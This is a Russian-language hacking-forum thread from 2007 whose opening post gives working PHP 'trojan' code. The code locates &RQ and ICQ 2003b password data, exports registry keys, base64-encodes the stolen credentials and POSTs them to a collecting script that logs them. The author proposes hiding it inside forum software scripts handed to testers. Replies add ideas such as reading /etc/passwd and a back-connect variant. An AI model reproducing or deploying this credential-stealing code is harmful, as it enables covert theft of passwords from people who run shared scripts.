Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Даем скрипты на тест или как украсть данные. |
11.03.2007, 17:33
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Даем скрипты на тест или как украсть данные.
Даем скрипты на тест или как украсть данные.
Пришла в голову идея: а что если внедрить в наш пхп-код "трояна"?
В этой статье я покажу все на примере кражи пароли из &RQ и icq 2003b, других клиентов у меня под рукой нет =)
&RQ
Просканируем основне папки, где он может лежать на наличие папки &RQ
PHP код:
<?php
$dir = scan_dir();
function scan_dir(){
//Папка с крысой
$rq = '&rq';
//Папки, где она может быть
$da = array(
"C:\\",
"D:\\",
"E:\\",
"C:\\Program Files\\",
"D:\\Program Files\\",
"E:\\Program Files\\"
);
foreach($da as $d){
if(file_exists($d.$rq) AND is_dir($d.$rq)) return $d.$rq;
}
return false;
}
if($dir){
$temp = opendir($dir);
while (false !== ($file = readdir($temp)))
{
if(is_dir($dir.'/'.$file) AND is_numeric($file))
{
if(file_exists($dir.'\\'.$file.'\\andrq.ini')){
$arr = file($dir.'\\'.$file.'\\andrq.ini');
foreach($arr as $a){
if(stristr($a, 'crypted-password')){
$pass .= base64_encode("Number: $file , Password: $a ")."\n";
break;
}
}
}
}
}
}
?>
Вы наверное скажете, ведь можно было просканировать весь жесткий диск на наличие этой папки... А я вам в ответ: попробуйте, потом напишите мне , сколько времени у вас ушло на 200гб диск 
Ну что же, мы получили данные, в случае удачи. Теперь как их нам отослать? Самое простое что приходит в мозги - послать по мылу.
Но давайте вспомним, что у большинства тестеров стоит денвер с его заглушкой. Хм... Тогда отправим данные к нам на серрвер.
Для начала создадим принимающий скрипт
PHP код:
<?php
$str = $_POST['str'];
$log = 'passwords';
$f = fopen($log, 'a');
fwrite($f, "\n ========== \n" . $str . "\n ========== \n");
fclose($f);
?>
Теперь отсылаем ему данные:
PHP код:
<?php
$host = 'localhost';
$fp = fsockopen ($host, 80, $errno, $errstr, 10);
$r = "POST /pass.php HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: ".strlen($pass)."
str=$pass";
fputs ($fp, $r);
fclose($fp);
?>
ICQ 2003b
Тут гораздо проще...
PHP код:
<?php
//Возьмем данные из реестра и запишем их в отдельный файл)
unset($pass);
@system("reg export HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners tmp");
//Прочтем файл
$pass = urlencode(base64_encode(file_get_contents('tmp')))."\n\n";
//пошлем данные
$host = 'localhost';
$fp = fsockopen ($host, 80, $errno, $errstr, 10);
$r = "POST /pass.php HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: ".strlen($pass)."
str=$pass";
fputs ($fp, $r);
fclose($fp);
//удалим файл
@unlink('tmp');
?>
Отлично! Все сделали
Как просмотреть? Просто раскодируйте строку из файла passwords,
например
PHP код:
<?php
echo urldecode(base64_decode("sdsdsd"));
?>
Для расшифровки паролей можно воспользоваться программой http://www.tolkuchka.dsip.net/index.php?showtopic=19516
Теперь скажете вы, кто же запустит такой скрипт? Да никто
Но а что если его проинклудить в том же IPB или VB? Врядли кто будет просматривать все файлы перед запуском... В общем - проявляйте фантазию =)
|
|
|
11.03.2007, 17:37
|
|
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330
Репутация:
343
|
|
Хорошая статья но каким образом его выполнить на удаленной машине?
|
|
|
|
11.03.2007, 17:38
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Прочитай заголовок внимательнее =)
|
|
|
|
11.03.2007, 17:40
|
|
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330
Репутация:
343
|
|
Хе хе=)Догнал..Да идея не плохая все таки не ехе файлы
|
|
|
|
11.03.2007, 17:48
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Попробую попользоваться... =)
1 вопросик (почти по теме):
Вот у меня идея появилась, не знаю возможно ли такое. Все наверное видели форму для загрузки файлов на файлообменники, а что если сделать такую страничку, заходя на которую, в поле для выбора файла стояло бы такое значение c:\program files\qip\config.txt и javascript'ом автоматически нажимать кнопку и файл пользователя загружался бы на сервер?
|
|
|
|
11.03.2007, 17:53
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
Iceangel_, такое невозможно.
|
|
|
|
11.03.2007, 19:28
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
Iceangel_ к сожалению разработчики хтмля, javascript и браузеров тоже не дураками были =)))
никто кроме пользователя не может ввести путь к файлу загрузки.
|
|
|
|
11.03.2007, 20:22
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
я писал что-то подобное
http://forum.antichat.ru/thread23432.html
|
|
|
|
11.03.2007, 20:34
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
небольшой офф
я вообще все скрипты исключительно на веб сервере тестю - нет привычки на локалке запускать :\ в таких случаях можно было бы вставить что-нибудь пытающееся поднять себе права и просмотреть ../../../etc/passw
|
|
|
|
11.03.2007, 22:01
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
писал такую "гадость" с бекконектом на мой комп если комунить интересно, голосуем в моей репе за новую статью :dd +1 хватит, хотя лучше больше)) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
